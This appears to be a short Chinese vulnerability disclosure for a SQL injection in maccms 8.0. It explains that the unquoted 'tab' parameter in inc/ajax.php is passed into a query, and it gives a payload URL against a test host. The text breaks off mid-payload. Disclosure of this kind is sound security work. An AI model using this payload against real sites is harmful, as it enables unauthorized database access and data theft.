maccms8.0 注入漏洞

简要描述： maccms8.0 注入漏洞 详细说明： 漏洞代码在 inc/ajax.php 首先通过封装的be方法取得tab参数 直接把tab参数带入到了查询当中，因为注入点不在双引号内部，所以可以直接注入。 这里需要一点小技巧让SQL语句不报错。payload如下： URL： http://10.1.157.64/maccms8mfb/inc/ajax.php ?ac=hits &tab=user,select1 as hits,2 as dayhits,3 as weekhits , 4 as monthhits ,5 as hitstimefrom dualtemp where 2...